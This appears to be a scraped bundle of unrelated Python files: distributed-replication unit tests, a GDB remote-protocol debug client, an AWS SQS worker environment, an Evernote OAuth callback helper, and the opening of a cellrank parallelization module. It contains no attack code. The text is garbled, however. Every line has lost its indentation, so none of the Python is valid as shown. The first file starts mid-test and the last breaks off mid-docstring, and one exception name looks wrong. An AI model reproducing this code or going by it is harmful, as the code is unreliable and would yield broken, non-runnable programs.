assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
c11.set(42)
c11.add(10)
c12.add(15)
c13.set('testKey', 'testValue')
doTicks(objs, 10.0, stopFunc=lambda: c21.get() == 52 and c22.get() == 15 and c23.get('testKey') == 'testValue')
assert c21.get() == 52
assert c22.get() == 15
assert c23.get('testKey') == 'testValue'
o1.forceLogCompaction()
o2.forceLogCompaction()
doTicks(objs, 0.5)
objs = [o1, o2, o3]
doTicks(objs, 10.0, stopFunc=lambda: c31.get() == 52 and c32.get() == 15 and c33.get('testKey') == 'testValue')
assert c31.get() == 52
assert c32.get() == 15
assert c33.get('testKey') == 'testValue'
o1.destroy()
o2.destroy()
o3.destroy()
def test_batteriesCommon():
d1 = ReplDict()
l1 = ReplLockManager(autoUnlockTime=30.0)
d2 = ReplDict()
l2 = ReplLockManager(autoUnlockTime=30.0)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.AUTO_TICK_1, consumers=[d1, l1])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.AUTO_TICK_1, consumers=[d2, l2])
doAutoTicks(10.0, stopFunc=lambda: o1.isReady() and o2.isReady())
assert o1.isReady() and o2.isReady()
d1.set('testKey', 'testValue', sync=True)
doAutoTicks(3.0, stopFunc=lambda: d2.get('testKey') == 'testValue')
assert d2['testKey'] == 'testValue'
d2.pop('testKey', sync=True)
doAutoTicks(3.0, stopFunc=lambda: d1.get('testKey') == None)
assert d1.get('testKey') == None
assert l1.tryAcquire('test.lock1', sync=True) == True
assert l2.tryAcquire('test.lock1', sync=True) == False
assert l2.isAcquired('test.lock1') == False
l1id = l1._ReplLockManager__selfID
l1._ReplLockManager__lockImpl.prolongate(l1id, 0, _doApply=True)
l1.release('test.lock1', sync=True)
assert l2.tryAcquire('test.lock1', sync=True) == True
assert d1.setdefault('keyA', 'valueA', sync=True) == 'valueA'
assert d2.setdefault('keyA', 'valueB', sync=True) == 'valueA'
d2.pop('keyA', sync=True)
assert d2.setdefault('keyA', 'valueB', sync=True) == 'valueB'
o1.destroy()
o2.destroy()
l1.destroy()
l2.destroy()
def test_ReplCounter():
c = ReplCounter()
c.set(42, _doApply=True)
assert c.get() == 42
c.add(10, _doApply=True)
assert c.get() == 52
c.sub(20, _doApply=True)
assert c.get() == 32
c.inc(_doApply=True)
assert c.get() == 33
def test_ReplList():
l = ReplList()
l.reset([1, 2, 3], _doApply=True)
assert l.rawData() == [1, 2, 3]
l.set(1, 10, _doApply=True)
assert l.rawData() == [1, 10, 3]
l.append(42, _doApply=True)
assert l.rawData() == [1, 10, 3, 42]
l.extend([5, 6], _doApply=True)
assert l.rawData() == [1, 10, 3, 42, 5, 6]
l.insert(2, 66, _doApply=True)
assert l.rawData() == [1, 10, 66, 3, 42, 5, 6]
l.remove(66, _doApply=True)
assert l.rawData() == [1, 10, 3, 42, 5, 6]
l.pop(1, _doApply=True)
assert l.rawData() == [1, 3, 42, 5, 6]
l.sort(reverse=True, _doApply=True)
assert l.rawData() == [42, 6, 5, 3, 1]
assert l.index(6) == 1
assert l.count(42) == 1
assert l.get(2) == 5
assert l[4] == 1
assert len(l) == 5
l.__setitem__(0, 43, _doApply=True)
assert l[0] == 43
def test_ReplDict():
d = ReplDict()
d.reset({
1: 1,
2: 22,
}, _doApply=True)
assert d.rawData() == {
1: 1,
2: 22,
}
d.__setitem__(1, 10, _doApply=True)
assert d.rawData() == {
1: 10,
2: 22,
}
d.set(1, 20, _doApply=True)
assert d.rawData() == {
1: 20,
2: 22,
}
assert d.setdefault(1, 50, _doApply=True) == 20
assert d.setdefault(3, 50, _doApply=True) == 50
d.update({
5: 5,
6: 7,
}, _doApply=True)
assert d.rawData() == {
1: 20,
2: 22,
3: 50,
5: 5,
6: 7,
}
assert d.pop(3, _doApply=True) == 50
assert d.pop(6, _doApply=True) == 7
assert d.pop(6, _doApply=True) == None
assert d.pop(6, 0, _doApply=True) == 0
assert d.rawData() == {
1: 20,
2: 22,
5: 5,
}
assert d[1] == 20
assert d.get(2) == 22
assert d.get(22) == None
assert d.get(22, 10) == 10
assert len(d) == 3
assert 2 in d
assert 22 not in d
assert sorted(d.keys()) == [1, 2, 5]
assert sorted(d.values()) == [5, 20, 22]
assert d.items() == d.rawData().items()
d.clear(_doApply=True)
assert len(d) == 0
def test_ReplSet():
s = ReplSet()
s.reset({1, 4}, _doApply=True)
assert s.rawData() == {1, 4}
s.add(10, _doApply=True)
assert s.rawData() == {1, 4, 10}
s.remove(1, _doApply=True)
s.discard(10, _doApply=True)
assert s.rawData() == {4}
assert s.pop(_doApply=True) == 4
s.add(48, _doApply=True)
s.update({9, 2, 3}, _doApply=True)
assert s.rawData() == {9, 2, 3, 48}
assert len(s) == 4
assert 9 in s
assert 42 not in s
s.clear(_doApply=True)
assert len(s) == 0
assert 9 not in s
def test_ReplQueue():
q = ReplQueue()
q.put(42, _doApply=True)
q.put(33, _doApply=True)
q.put(14, _doApply=True)
assert q.get(_doApply=True) == 42
assert q.qsize() == 2
assert len(q) == 2
assert q.empty() == False
assert q.get(_doApply=True) == 33
assert q.get(-1, _doApply=True) == 14
assert q.get(_doApply=True) == None
assert q.get(-1, _doApply=True) == -1
assert q.empty()
q = ReplQueue(3)
q.put(42, _doApply=True)
q.put(33, _doApply=True)
assert q.full() == False
assert q.put(14, _doApply=True) == True
assert q.full() == True
assert q.put(19, _doApply=True) == False
assert q.get(_doApply=True) == 42
def test_ReplPriorityQueue():
q = ReplPriorityQueue()
q.put(42, _doApply=True)
q.put(14, _doApply=True)
q.put(33, _doApply=True)
assert q.get(_doApply=True) == 14
assert q.qsize() == 2
assert len(q) == 2
assert q.empty() == False
assert q.get(_doApply=True) == 33
assert q.get(-1, _doApply=True) == 42
assert q.get(_doApply=True) == None
assert q.get(-1, _doApply=True) == -1
assert q.empty()
q = ReplPriorityQueue(3)
q.put(42, _doApply=True)
q.put(33, _doApply=True)
assert q.full() == False
assert q.put(14, _doApply=True) == True
assert q.full() == True
assert q.put(19, _doApply=True) == False
assert q.get(_doApply=True) == 14
# https://github.com/travis-ci/travis-ci/issues/8695
@pytest.mark.skipif(os.name == 'nt' or os.environ.get('TRAVIS') == 'true', reason='temporary disabled for windows')
def test_ipv6():
random.seed(42)
a = [getNextAddr(ipv6=True), getNextAddr(ipv6=True)]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
def test_localhost():
random.seed(42)
a = [getNextAddr(isLocalhost=True), getNextAddr(isLocalhost=True)]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 3.0, stopFunc=lambda: o1._isReady() and o2._isReady())
o1.waitBinded()
o2.waitBinded()
o1._printStatus()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
def test_leaderFallback():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], leaderFallbackTimeout=30.0)
o2 = TestObj(a[1], [a[0]], leaderFallbackTimeout=30.0)
objs = [o1, o2]
assert not o1._isReady()
assert not o2._isReady()
doTicks(objs, 5.0, stopFunc=lambda: o1._isReady() and o2._isReady())
o1._SyncObj__conf.leaderFallbackTimeout = 3.0
o2._SyncObj__conf.leaderFallbackTimeout = 3.0
doTicks([o for o in objs if o._isLeader()], 2.0)
assert o1._isLeader() or o2._isLeader()
doTicks([o for o in objs if o._isLeader()], 2.0)
assert not o1._isLeader() and not o2._isLeader()
class ZeroDeployConsumerAlpha(SyncObjConsumer):
@replicated(ver=1)
def someMethod(self):
pass
@replicated
def methodTwo(self):
pass
class ZeroDeployConsumerBravo(SyncObjConsumer):
@replicated
def alphaMethod(self):
pass
@replicated(ver=3)
def methodTwo(self):
pass
class ZeroDeployTestObj(SyncObj):
def __init__(self, selfAddr, otherAddrs, consumers):
cfg = SyncObjConf(autoTick=False)
super(ZeroDeployTestObj, self).__init__(selfAddr, otherAddrs, cfg, consumers=consumers)
@replicated
def someMethod(self):
pass
@replicated
def otherMethod(self):
pass
@replicated(ver=1)
def thirdMethod(self):
pass
@replicated(ver=2)
def lastMethod(self):
pass
@replicated(ver=3)
def lastMethod(self):
pass
def test_zeroDeployVersions():
random.seed(42)
a = [getNextAddr()]
cAlpha = ZeroDeployConsumerAlpha()
cBravo = ZeroDeployConsumerBravo()
o1 = ZeroDeployTestObj(a[0], [], [cAlpha, cBravo])
assert hasattr(o1, 'otherMethod_v0') == True
assert hasattr(o1, 'lastMethod_v2') == True
assert hasattr(o1, 'lastMethod_v3') == True
assert hasattr(o1, 'lastMethod_v4') == False
assert hasattr(cAlpha, 'methodTwo_v0') == True
assert hasattr(cBravo, 'methodTwo_v3') == True
assert o1._methodToID['lastMethod_v2'] > o1._methodToID['otherMethod_v0']
assert o1._methodToID['lastMethod_v3'] > o1._methodToID['lastMethod_v2']
assert o1._methodToID['lastMethod_v3'] > o1._methodToID['someMethod_v0']
assert o1._methodToID['thirdMethod_v1'] > o1._methodToID['someMethod_v0']
assert o1._methodToID['lastMethod_v2'] > o1._methodToID[(id(cAlpha), 'methodTwo_v0')]
assert o1._methodToID[id(cBravo), 'methodTwo_v3'] > o1._methodToID['lastMethod_v2']
assert 'someMethod' not in o1._methodToID
assert 'thirdMethod' not in o1._methodToID
assert 'lastMethod' not in o1._methodToID
def test_dnsResolverBug(monkeypatch):
monkeypatch.setattr(dns_resolver, "monotonicTime", lambda: 0.0)
resolver = dns_resolver.DnsCachingResolver(600, 30)
ip = resolver.resolve('localhost')
assert ip == '127.0.0.1'
class MockSocket(object):
def __init__(self, socket, numSuccessSends):
self.socket = socket
self.numSuccessSends = numSuccessSends
def send(self, data):
self.numSuccessSends -= 1
if self.numSuccessSends <= 0:
return -100500
return self.socket.send(data)
def close(self):
return self.socket.close()
def getsockopt(self, *args, **kwargs):
return self.socket.getsockopt(*args, **kwargs)
def recv(self, *args, **kwargs):
return self.socket.recv(*args, **kwargs)
def setMockSocket(o, numSuccess = 0):
for readonlyNode in o._SyncObj__readonlyNodes:
for node, conn in o._SyncObj__transport._connections.items():
if node == readonlyNode:
origSocket = conn._TcpConnection__socket
conn._TcpConnection__socket = MockSocket(origSocket, numSuccess)
#origSend = origSocket.send
#origSocket.send = lambda x: mockSend(origSend, x)
#print("Set mock send")
def test_readOnlyDrop():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
o3 = TestObj(None, [a[0], a[1]])
objs = [o1, o2, o3]
assert not o1._isReady()
assert not o2._isReady()
assert not o3._isReady()
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
o1.waitBinded()
o2.waitBinded()
o1._printStatus()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350 and o3.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
assert o3.getCounter() == 350
setMockSocket(o1, 1)
setMockSocket(o2, 1)
global _g_numSuccessSends
_g_numSuccessSends = 0
for i in range(150):
o1.addValue(1)
for i in range(200):
o2.addValue(1)
doTicks(objs, 10.0, stopFunc=lambda: o1.getCounter() == 700 and o2.getCounter() == 700)
assert o1.getCounter() == 700
assert o2.getCounter() == 700
o1._destroy()
o2._destroy()
o3._destroy()
def test_filterParners():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[0]])
assert len(o1._SyncObj__otherNodes) == 1
|
client.py
|
"""
Gdb debug client implementation for the debugger driver.
"""
import abc
import binascii
import logging
import struct
import string
import queue
from threading import Thread
from ..debug_driver import DebugDriver, DebugState
from .rsp import RspHandler
INTERRUPT = 2
BRKPOINT = 5
class GdbCommHandler(metaclass=abc.ABCMeta):
""" This class deals with the logic of communication """
def shake(self, message):
pass
class ThreadedCommHandler(GdbCommHandler):
""" A comm handler that uses a thread """
def __init__(self):
self.rxqueue = queue.Queue()
def send(self):
pass
def recv(self):
self.rxqueue.get()
# Idea: the gdb class should work threaded and non-threaded. How to do it?
# class AsyncCommHandler(GdbCommHandler):
# """ Communicate using asyncio """
# def __init__(self):
# self.event_loop = None
#
# def recv_loop(self):
# while True:
# data = await recv()
#
# def recv(self):
# if queue:
# pass
# else:
# yield to ioloop
class GdbDebugDriver(DebugDriver):
""" Implement debugging via the GDB remote interface.
GDB servers can communicate via the RSP protocol.
Helpfull resources:
http://www.embecosm.com/appnotes/ean4/
embecosm-howto-rsp-server-ean4-issue-2.html
- https://sourceware.org/gdb/onlinedocs/gdb/Stop-Reply-Packets.html
Tried to make this class about the protocol itself, not about the
sending and receiving of bytes. The protocol must be able to
work using sockets and threads, serial port and threads and asyncio
sockets.
"""
logger = logging.getLogger('gdbclient')
def __init__(self, arch, transport, pcresval=0, swbrkpt=False):
super().__init__()
self.arch = arch
self.transport = transport
self.status = DebugState.RUNNING
self.pcresval = pcresval
self._register_value_cache = {} # Cached map of register values
self.swbrkpt = swbrkpt
self.stopreason = INTERRUPT
self._message_handler = None
self._stop_msg_queue = queue.Queue()
self._msg_queue = queue.Queue(maxsize=1)
self._rsp = RspHandler(transport)
self._rsp.on_message = self._handle_message
def __str__(self):
return 'Gdb debug driver via {}'.format(self.transport)
def connect(self):
""" Connect to the target """
self._message_handler = Thread(target=self._handle_stop_queue)
self._message_handler.start()
self.transport.connect()
# self.send('?')
def disconnect(self):
""" Disconnect the client """
self.transport.disconnect()
self._stop_msg_queue.put(1337)
self._message_handler.join()
def _handle_stop_queue(self):
self.logger.debug('stop thread started')
msg = self._stop_msg_queue.get()
while msg != 1337:
self._process_stop_status(msg)
msg = self._stop_msg_queue.get()
self.logger.debug('stop thread finished')
def run(self):
""" start the device """
if self.status == DebugState.STOPPED:
self._prepare_continue()
else:
self.logger.warning('Already running!')
self._send_message("c")
self._start()
def restart(self):
""" restart the device """
if self.status == DebugState.STOPPED:
self.set_pc(self.pcresval)
self.run()
else:
self.logger.warning('Cannot restart, still running!')
def step(self):
""" Single step the device """
if self.status == DebugState.STOPPED:
self._prepare_continue()
self._send_message("s")
self._start()
else:
self.logger.warning('Cannot step, still running!')
def nstep(self, count):
""" Single step `count` times """
if self.status == DebugState.STOPPED:
self._prepare_continue()
self._send_message("n %x" % count)
self._start()
else:
self.logger.warning('Cannot step, still running!')
def _prepare_continue(self):
""" Set program counter somewhat back to continue """
if self.swbrkpt and self.stopreason is BRKPOINT:
pc = self.get_pc()
self.clear_breakpoint(pc - 4)
self.set_pc(pc - 4)
def stop(self):
if self.status == DebugState.RUNNING:
self._sendbrk()
else:
self.logger.warning('Cannot stop if not running')
def _sendbrk(self):
""" sends break command to the device """
self.logger.debug('Sending RAW stop 0x3')
self.transport.send(bytes([0x03]))
def _start(self):
""" Update state to started """
self.status = DebugState.RUNNING
self._register_value_cache.clear()
self.events.on_start()
def _stop(self):
self.status = DebugState.STOPPED
self.events.on_stop()
def _process_stop_status(self, pkt):
""" Process stopped status like these:
S05
T0500:00112233;
T05thread:01;
"""
assert pkt.startswith(('S', 'T'))
code = int(pkt[1:3], 16) # signal number
self.stopreason = code
if pkt.startswith('T'):
rest = pkt[3:]
for pair in map(str.strip, rest.split(';')):
if not pair:
continue
name, value = pair.split(':')
if is_hex(name):
# We are dealing with a register value here!
reg_num = int(name, 16)
#self.logger.error('%s', reg_num)
if reg_num == self.arch.gdb_registers.index(self.arch.gdb_pc):
# TODO: fill a cache of registers
data = bytes.fromhex(rest[3:-1])
self.pcstopval, = struct.unpack('<I', data)
if code & (BRKPOINT | INTERRUPT) != 0:
self.logger.debug("Target stopped..")
# If the program counter was not given in the stop packet
# retrieve it now
if self.arch.gdb_pc not in self._register_value_cache:
self.logger.debug('Retrieving general registers')
self._get_general_registers()
self._stop()
else:
self.logger.debug("Target running..")
self.status = DebugState.RUNNING
def get_status(self):
return self.status
def get_pc(self):
""" read the PC of the device """
if self.status == DebugState.STOPPED:
return self._get_register(self.arch.gdb_pc)
else:
return 0
def set_pc(self, value):
""" set the PC of the device """
self._set_register(self.arch.gdb_pc, value)
self.logger.debug("PC value set:%x", value)
def get_fp(self):
""" read the frame pointer """
return 0x100
fp = self._get_register(self.arch.fp)
self.logger.debug("FP value read:%x", fp)
return fp
def get_registers(self, registers):
if self.status == DebugState.STOPPED:
regs = self._get_general_registers()
else:
self.logger.warning('Cannot read registers while running')
regs = {}
return regs
def _get_general_registers(self):
""" Execute the gdb `g` command """
data = self._send_command("g")
data = binascii.a2b_hex(data.encode('ascii'))
res = {}
offset = 0
for register in self.arch.gdb_registers:
size = register.bitsize // 8
reg_data = data[offset:offset + size]
value = self._unpack_register(register, reg_data)
res[register] = value
# self.logger.debug('reg %s = %s', register, value)
self._register_value_cache[register] = value
offset += size
if len(data) != offset:
self.logger.error(
'Received %s bytes register data, processed %s',
len(data), offset)
return res
def set_registers(self, regvalues):
if self.status == DebugState.STOPPED:
data = bytearray()
res = {}
offset = 0
for register in self.arch.gdb_registers:
reg_data = self._pack_register(register, regvalues[register])
size = register.bitsize // 8
data[offset:offset + size] = reg_data
offset += size
data = binascii.b2a_hex(data).decode('ascii')
res = self._send_command("G %s" % data)
if res == 'OK':
self.logger.debug('Register written')
else:
self.logger.warning('Registers writing failed: %s', res)
def _get_register(self, register):
""" Get a single register """
if self.status == DebugState.STOPPED:
if register in self._register_value_cache:
value = self._register_value_cache[register]
else:
idx = self.arch.gdb_registers.index(register)
data = self._send_command("p %x" % idx)
data = binascii.a2b_hex(data.encode('ascii'))
value = self._unpack_register(register, data)
self._register_value_cache[register] = value
return value
else:
self.logger.warning(
'Cannot read register %s while not stopped', register)
return 0
def _set_register(self, register, value):
""" Set a single register """
if self.status == DebugState.STOPPED:
idx = self.arch.gdb_registers.index(register)
value = self._pack_register(register, value)
value = binascii.b2a_hex(value).decode('ascii')
res = self._send_command("P %x=%s" % (idx, value))
if res == 'OK':
self.logger.debug('Register written')
else:
self.logger.warning('Register write failed: %s', res)
def _unpack_register(self, register, data):
""" Fetch a register from some data """
fmts = {
8: '<Q',
4: '<I',
2: '<H',
1: '<B',
}
size = register.bitsize // 8
if len(data) == size:
if size == 3:
value = data[0] + (data[1] << 8) + (data[2] << 16)
else:
value, = struct.unpack(fmts[size], data)
else:
self.logger.error('Could not read register %s', register)
value = 0
return value
@staticmethod
def _pack_register(register, value):
""" Put some data in a register """
fmts = {
8: '<Q',
4: '<I',
2: '<H',
1: '<B',
}
size = register.bitsize // 8
data = struct.pack(fmts[size], value)
return data
def set_breakpoint(self, address: int):
""" Set a breakpoint """
if self.status == DebugState.STOPPED:
res = self._send_command("Z0,%x,4" % address)
if res == 'OK':
self.logger.debug('Breakpoint set')
else:
self.logger.warning('Breakpoint not set: %s', res)
else:
self.logger.warning('Cannot set breakpoint, target not stopped!')
def clear_breakpoint(self, address: int):
""" Clear a breakpoint """
if self.status == DebugState.STOPPED:
res = self._send_command("z0,%x,4" % address)
if res == 'OK':
self.logger.debug('Breakpoint cleared')
else:
self.logger.warning('Breakpoint not cleared: %s', res)
else:
self.logger.warning('Cannot clear breakpoint, target not stopped!')
def read_mem(self, address: int, size: int):
""" Read memory from address """
if self.status == DebugState.STOPPED:
res = self._send_command("m %x,%x" % (address, size))
ret = binascii.a2b_hex(res.encode('ascii'))
return ret
else:
self.logger.warning('Cannot read memory, target not stopped!')
return bytes()
def write_mem(self, address: int, data):
""" Write memory """
if self.status == DebugState.STOPPED:
length = len(data)
data = binascii.b2a_hex(data).decode('ascii')
res = self._send_command("M %x,%x:%s" % (address, length, data))
if res == 'OK':
self.logger.debug('Memory written')
else:
self.logger.warning('Memory write failed: %s', res)
else:
self.logger.warning('Cannot write memory, target not stopped!')
def _handle_message(self, message):
# Filter stop packets:
if message.startswith(('T', 'S')):
self._stop_msg_queue.put(message)
else:
self._msg_queue.put(message)
def _send_command(self, command):
""" Send a gdb command a receive a response """
self._send_message(command)
return self._recv_message()
def _recv_message(self, timeout=3):
""" Block until a packet is received """
return self._msg_queue.get(timeout=timeout)
def _send_message(self, message):
self._rsp.sendpkt(message)
def is_hex(text: str) -> bool:
""" Check if the given text is hexadecimal """
return all(c in string.hexdigits for c in text)
|
sqs_env.py
|
import logging
import multiprocessing
import warnings
import os
from typing import TYPE_CHECKING, Dict, Optional, Type, Union
import attr
import boto3
import requests
from sqs_workers import DEFAULT_BACKOFF, RawQueue, codecs, context, processors
from sqs_workers.core import RedrivePolicy
from sqs_workers.processors import DEFAULT_CONTEXT_VAR
from sqs_workers.queue import GenericQueue, JobQueue
from sqs_workers.shutdown_policies import NeverShutdown
if TYPE_CHECKING:
from sqs_workers.backoff_policies import BackoffPolicy
logger = logging.getLogger(__name__)
AnyQueue = Union[GenericQueue, JobQueue]
@attr.s
class SQSEnv(object):
session = attr.ib(default=boto3)
queue_prefix = attr.ib(default="")
# queue-specific settings
backoff_policy = attr.ib(default=DEFAULT_BACKOFF)
# jobqueue-specific settings
processor_maker = attr.ib(default=processors.Processor)
context_maker = attr.ib(default=context.SQSContext)
# internal attributes
context = attr.ib(default=None)
sqs_client = attr.ib(default=None)
sqs_resource = attr.ib(default=None)
queues = attr.ib(init=False, factory=dict) # type: Dict[str, AnyQueue]
def __attrs_post_init__(self):
if "AWS_DEFAULT_REGION" not in os.environ:
try:
os.environ["AWS_DEFAULT_REGION"] = (
requests.get("http://169.254.169.254/latest/dynamic/instance-identity/document", timeout=2).json().get("region")
)
except requests.RequestError:
pass
self.context = self.context_maker()
self.sqs_client = self.session.client("sqs")
self.sqs_resource = self.session.resource("sqs")
def queue(
self,
queue_name, # type: str
queue_maker=JobQueue, # type: Type[AnyQueue]
backoff_policy=None, # type: Optional[BackoffPolicy]
):
# type: (...) -> GenericQueue
"""
Get a queue object, initializing it with queue_maker if necessary.
"""
if queue_name not in self.queues:
backoff_policy = backoff_policy or self.backoff_policy
self.queues[queue_name] = queue_maker(env=self, name=queue_name, backoff_policy=backoff_policy)
return self.queues[queue_name]
def processor(self, queue_name, job_name, pass_context=False, context_var=DEFAULT_CONTEXT_VAR):
"""
Decorator to attach processor to all jobs "job_name" of the queue "queue_name".
"""
q = self.queue(queue_name, queue_maker=JobQueue) # type: JobQueue
return q.processor(job_name=job_name, pass_context=pass_context, context_var=context_var)
def raw_processor(self, queue_name):
"""
Decorator to attach raw processor to all jobs of the queue "queue_name".
"""
q = self.queue(queue_name, queue_maker=RawQueue) # type: RawQueue
return q.raw_processor()
def add_job(
self, queue_name, job_name, _content_type=codecs.DEFAULT_CONTENT_TYPE, _delay_seconds=None, _deduplication_id=None, _group_id=None, **job_kwargs
):
"""
Add job to the queue.
"""
warnings.warn(
"sqs.add_job() is deprecated. Use sqs.queue(...).add_job() instead", DeprecationWarning,
)
q = self.queue(queue_name, queue_maker=JobQueue) # type: JobQueue
return q.add_job(
job_name, _content_type=_content_type, _delay_seconds=_delay_seconds, _deduplication_id=_deduplication_id, _group_id=_group_id, **job_kwargs
)
def process_queues(self, queue_names=None, shutdown_policy_maker=NeverShutdown):
"""
Use multiprocessing to process multiple queues at once. If queue names
are not set, process all known queues
shutdown_policy_maker is an optional callable which doesn't accept any
arguments and create a new shutdown policy for each queue.
Can looks somewhat like this:
lambda: IdleShutdown(idle_seconds=10)
"""
if not queue_names:
queue_names = self.get_all_known_queues()
processes = []
for queue_name in queue_names:
queue = self.queue(queue_name)
p = multiprocessing.Process(target=queue.process_queue, kwargs={"shutdown_policy": shutdown_policy_maker()},)
p.start()
processes.append(p)
for p in processes:
p.join()
def get_all_known_queues(self):
resp = self.sqs_client.list_queues(**{"QueueNamePrefix": self.queue_prefix})
if "QueueUrls" not in resp:
return []
urls = resp["QueueUrls"]
ret = []
for url in urls:
sqs_name = url.rsplit("/", 1)[-1]
queue_prefix_len = len(self.queue_prefix)
ret.append(sqs_name[queue_prefix_len:])
return ret
def get_sqs_queue_name(self, queue_name):
"""
Take "high-level" (user-visible) queue name and return SQS
("low level") name by simply prefixing it. Used to create namespaces
for different environments (development, staging, production, etc)
"""
return "{}{}".format(self.queue_prefix, queue_name)
def is_lambda_env(self):
return "LAMBDA_TASK_ROOT" in os.environ or "AWS_EXECUTION_ENV" in os.environ
def redrive_policy(self, dead_letter_queue_name, max_receive_count):
return RedrivePolicy(self, dead_letter_queue_name, max_receive_count)
|
evernote_client_oauth.py
|
import threading
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qsl, quote, urlparse
import oauth2
from evernote_backup.cli_app_util import is_inside_docker
from evernote_backup.evernote_client import EvernoteClientBase
class OAuthDeclinedError(Exception):
"""Raise when user cancels authentication"""
class CallbackHandler(BaseHTTPRequestHandler):
http_codes = {
"OK": 200,
"NOT FOUND": 404,
}
def do_GET(self) -> None:
response = urlparse(self.path)
if response.path != "/oauth_callback":
self.send_response(self.http_codes["NOT FOUND"])
self.end_headers()
return
self.server.callback_response = dict(parse_qsl(response.query)) # type: ignore
self.send_response(self.http_codes["OK"])
self.end_headers()
self.wfile.write(
"<html><head><title>OAuth Callback</title></head>"
"<body>You can close this tab now...</body></html>".encode("utf-8")
)
def log_message(self, *args, **kwargs) -> None: # type: ignore
"""Silencing server log"""
class StoppableHTTPServer(HTTPServer):
def __init__(self, *args, **kwargs) -> None: # type: ignore
super().__init__(*args, **kwargs)
self.callback_response: dict = {}
def run(self) -> None:
try: # noqa: WPS501
self.serve_forever()
finally:
self.server_close()
class EvernoteOAuthCallbackHandler(object):
def __init__(self, oauth_client: "EvernoteOAuthClient", oauth_port: int) -> None:
self.client = oauth_client
self.server_host = "localhost"
self.server_port = oauth_port
self.oauth_token: dict = {}
def get_oauth_url(self) -> str:
self.oauth_token = self.client.get_request_token(
f"http://{self.server_host}:{self.server_port}/oauth_callback"
)
return self.client.get_authorize_url(self.oauth_token)
def wait_for_token(self) -> str:
callback = self._wait_for_callback()
if "oauth_verifier" not in callback:
raise OAuthDeclinedError
return self.client.get_access_token(
oauth_token=callback["oauth_token"],
oauth_verifier=callback["oauth_verifier"],
oauth_token_secret=self.oauth_token["oauth_token_secret"],
)
def _wait_for_callback(self) -> dict:
if is_inside_docker():
server_param = ("0.0.0.0", self.server_port) # noqa: S104
else:
server_param = (self.server_host, self.server_port)
callback_server = StoppableHTTPServer(server_param, CallbackHandler)
thread = threading.Thread(target=callback_server.run)
thread.start()
try: # noqa: WPS501
while not callback_server.callback_response:
time.sleep(0.1)
finally:
callback_server.shutdown()
thread.join()
return callback_server.callback_response
class EvernoteOAuthClient(EvernoteClientBase):
def __init__(
self,
backend: str,
consumer_key: str,
consumer_secret: str,
) -> None:
super().__init__(backend=backend)
self.consumer_key = consumer_key
self.consumer_secret = consumer_secret
def get_authorize_url(self, request_token: dict) -> str:
return "{0}?oauth_token={1}".format(
self._get_endpoint("OAuth.action"),
quote(request_token["oauth_token"]),
)
def get_request_token(self, callback_url: str) -> dict:
client = self._get_oauth_client()
request_url = "{0}?oauth_callback={1}".format(
self._get_endpoint("oauth"), quote(callback_url)
)
_, response_content = client.request(request_url, "GET")
return dict(parse_qsl(response_content.decode("utf-8")))
def get_access_token(
self,
oauth_token: str,
oauth_token_secret: str,
oauth_verifier: str,
) -> str:
token = oauth2.Token(oauth_token, oauth_token_secret)
token.set_verifier(oauth_verifier)
client = self._get_oauth_client(token)
_, response_content = client.request(self._get_endpoint("oauth"), "POST")
access_token_dict = dict(parse_qsl(response_content.decode("utf-8")))
return access_token_dict["oauth_token"]
def _get_oauth_client(self, token: Optional[oauth2.Token] = None) -> oauth2.Client:
consumer = oauth2.Consumer(self.consumer_key, self.consumer_secret)
return oauth2.Client(consumer, token) if token else oauth2.Client(consumer)
|
_parallelize.py
|
# -*- coding: utf-8 -*-
"""Module used to parallelize model fitting."""
from typing import Any, Union, Callable, Optional, Sequence
from threading import Thread
from multiprocessing import Manager
import numpy as np
import joblib as jl
from cellrank.utils._utils import _get_n_cores
_msg_shown = False
def parallelize(
callback: Callable[[Any], Any],
collection: Sequence[Any],
n_jobs: Optional[int] = None,
n_split: Optional[int] = None,
unit: str = "",
as_array: bool = True,
use_ixs: bool = False,
backend: str = "multiprocessing",
extractor: Optional[Callable[[Any], Any]] = None,
show_progress_bar: bool = True,
) -> Union[np.ndarray, Any]:
"""
Parallelize function call over a collection of elements.
Params
------
callback
Function to parallelize.
collection
Sequence of items which to chunkify.
n_jobs
Number of parallel jobs.
n_split
Split :paramref:`collection` into :paramref:`n_split` chunks.
If `None`, split into :paramref:`n_jobs` chunks.
unit
Unit of the progress bar.
as_array
Whether to convert the results not :class:`numpy.ndarray`.
use_ixs
